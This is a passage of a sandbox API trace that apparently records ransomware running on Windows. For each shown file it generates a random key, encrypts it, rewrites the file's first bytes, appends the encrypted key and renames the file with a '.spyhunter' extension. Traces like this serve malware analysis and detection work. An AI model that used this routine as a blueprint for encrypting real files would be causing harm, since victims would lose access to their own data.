lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.spyhunter")) returned 1 [0139.648] GetProcessHeap () returned 0x2c0000 [0139.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0139.648] GetProcessHeap () returned 0x2c0000 [0139.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.648] GetProcessHeap () returned 0x2c0000 [0139.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39ae0 | out: hHeap=0x2c0000) returned 1 [0139.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf160 | out: pbBuffer=0x25cf160) returned 1 [0139.669] GetProcessHeap () returned 0x2c0000 [0139.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf158*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf158*=0x30) returned 1 [0139.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0139.674] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned 152 [0139.674] StrStrW (lpFirst="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", lpSrch=".txt") returned 0x0 [0139.674] GetProcessHeap () returned 0x2c0000 [0139.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.674] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf11c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf11c*=0x1a4, lpOverlapped=0x0) returned 1 [0139.675] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.675] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1a4, lpNumberOfBytesWritten=0x25cf11c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf11c*=0x1a4, lpOverlapped=0x0) returned 1 [0139.675] GetProcessHeap () returned 0x2c0000 [0139.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.675] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.675] WriteFile (in: hFile=0x178, lpBuffer=0x25cf15c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf11c, lpOverlapped=0x0 | out: lpBuffer=0x25cf15c*, lpNumberOfBytesWritten=0x25cf11c*=0x4, lpOverlapped=0x0) returned 1 [0139.676] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf11c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf11c*=0x30, lpOverlapped=0x0) returned 1 [0139.676] CloseHandle (hObject=0x178) returned 1 [0139.676] GetProcessHeap () returned 0x2c0000 [0139.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.676] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.spyhunter") returned 162 [0139.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c.spyhunter")) returned 1 [0139.676] GetProcessHeap () returned 0x2c0000 [0139.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.676] GetProcessHeap () returned 0x2c0000 [0139.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.677] GetProcessHeap () returned 0x2c0000 [0139.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed2d0 | out: hHeap=0x2c0000) returned 1 [0139.677] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf158 | out: pbBuffer=0x25cf158) returned 1 [0139.677] GetProcessHeap () returned 0x2c0000 [0139.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf150*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf150*=0x30) returned 1 [0139.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0139.681] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned 120 [0139.681] StrStrW (lpFirst="imagesrv.adition[1].xml", lpSrch=".txt") returned 0x0 [0139.681] GetProcessHeap () returned 0x2c0000 [0139.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.681] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf114, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf114*=0xd, lpOverlapped=0x0) returned 1 [0139.682] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.682] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x25cf114, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf114*=0xd, lpOverlapped=0x0) returned 1 [0139.682] GetProcessHeap () returned 0x2c0000 [0139.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0139.683] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.683] WriteFile (in: hFile=0x170, lpBuffer=0x25cf154*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf114, lpOverlapped=0x0 | out: lpBuffer=0x25cf154*, lpNumberOfBytesWritten=0x25cf114*=0x4, lpOverlapped=0x0) returned 1 [0139.683] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf114, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cf114*=0x30, lpOverlapped=0x0) returned 1 [0139.683] CloseHandle (hObject=0x170) returned 1 [0139.683] GetProcessHeap () returned 0x2c0000 [0139.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0139.683] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.spyhunter") returned 130 [0139.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.spyhunter")) returned 1 [0139.684] GetProcessHeap () returned 0x2c0000 [0139.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0139.684] GetProcessHeap () returned 0x2c0000 [0139.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.684] GetProcessHeap () returned 0x2c0000 [0139.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbf550 | out: hHeap=0x2c0000) returned 1 [0140.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf138 | out: pbBuffer=0x25cf138) returned 1 [0140.028] GetProcessHeap () returned 0x2c0000 [0140.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.028] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf130*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf130*=0x30) returned 1 [0140.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.028] GetProcessHeap () returned 0x2c0000 [0140.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.028] GetProcessHeap () returned 0x2c0000 [0140.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f688d0 | out: hHeap=0x2c0000) returned 1 [0140.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf130 | out: pbBuffer=0x25cf130) returned 1 [0140.028] GetProcessHeap () returned 0x2c0000 [0140.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.028] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf128*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf128*=0x30) returned 1 [0140.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.029] GetProcessHeap () returned 0x2c0000 [0140.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.029] GetProcessHeap () returned 0x2c0000 [0140.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f687b8 | out: hHeap=0x2c0000) returned 1 [0140.029] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf130 | out: pbBuffer=0x25cf130) returned 1 [0140.029] GetProcessHeap () returned 0x2c0000 [0140.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.029] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf128*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf128*=0x30) returned 1 [0140.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0140.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat") returned 100 [0140.030] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0140.030] GetProcessHeap () returned 0x2c0000 [0140.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.030] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf0ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.235] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.235] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf0ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf0ec*=0x2800, lpOverlapped=0x0) returned 1 [0140.235] GetProcessHeap () returned 0x2c0000 [0140.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.235] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.235] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf12c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0ec, lpOverlapped=0x0 | out: lpBuffer=0x25cf12c*, lpNumberOfBytesWritten=0x25cf0ec*=0x4, lpOverlapped=0x0) returned 1 [0140.235] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0ec*=0x30, lpOverlapped=0x0) returned 1 [0140.235] CloseHandle (hObject=0xb4) returned 1 [0140.236] GetProcessHeap () returned 0x2c0000 [0140.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.236] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.spyhunter") returned 110 [0140.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\index.dat.spyhunter")) returned 1 [0140.237] GetProcessHeap () returned 0x2c0000 [0140.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.237] GetProcessHeap () returned 0x2c0000 [0140.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.237] GetProcessHeap () returned 0x2c0000 [0140.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f686a0 | out: hHeap=0x2c0000) returned 1 [0140.237] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf128 | out: pbBuffer=0x25cf128) returned 1 [0140.237] GetProcessHeap () returned 0x2c0000 [0140.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.237] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf120*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf120*=0x30) returned 1 [0140.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0140.239] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 87 [0140.239] StrStrW (lpFirst="Templates.LNK", lpSrch=".txt") returned 0x0 [0140.239] GetProcessHeap () returned 0x2c0000 [0140.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.239] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf0e4*=0x472, lpOverlapped=0x0) returned 1 [0140.374] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.374] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf0e4*=0x472, lpOverlapped=0x0) returned 1 [0140.374] GetProcessHeap () returned 0x2c0000 [0140.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.374] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.374] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf124*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf124*, lpNumberOfBytesWritten=0x25cf0e4*=0x4, lpOverlapped=0x0) returned 1 [0140.375] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0e4*=0x30, lpOverlapped=0x0) returned 1 [0140.375] CloseHandle (hObject=0xb4) returned 1 [0140.375] GetProcessHeap () returned 0x2c0000 [0140.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.375] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.spyhunter") returned 97 [0140.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.spyhunter")) returned 1 [0140.376] GetProcessHeap () returned 0x2c0000 [0140.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.376] GetProcessHeap () returned 0x2c0000 [0140.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0140.376] GetProcessHeap () returned 0x2c0000 [0140.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a490 | out: hHeap=0x2c0000) returned 1 [0140.376] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf128 | out: pbBuffer=0x25cf128) returned 1 [0140.376] GetProcessHeap () returned 0x2c0000 [0140.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0140.376] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf120*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf120*=0x30) returned 1 [0140.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0140.376] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk") returned 135 [0140.377] StrStrW (lpFirst="Windows Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0140.377] GetProcessHeap () returned 0x2c0000 [0140.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0140.377] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf0e4*=0x4cc, lpOverlapped=0x0) returned 1 [0140.377] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.377] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf0e4*=0x4cc, lpOverlapped=0x0) returned 1 [0140.378] GetProcessHeap () returned 0x2c0000 [0140.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0140.378] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.378] WriteFile (in: hFile=0xb4, lpBuffer=0x25cf124*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf124*, lpNumberOfBytesWritten=0x25cf0e4*=0x4, lpOverlapped=0x0) returned 1 [0140.378] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf0e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf0e4*=0x30, lpOverlapped=0x0) returned 1 [0140.378] CloseHandle (hObject=0xb4) returned 1 [0140.378] GetProcessHeap () returned 0x2c0000 [0140.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.378] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.spyhunter") returned 145 [0140.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer (2).lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer (2).lnk.spyhunter")) returned 1 [0140.379] GetProcessHeap () returned 0x2c0000 [0140.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.379] 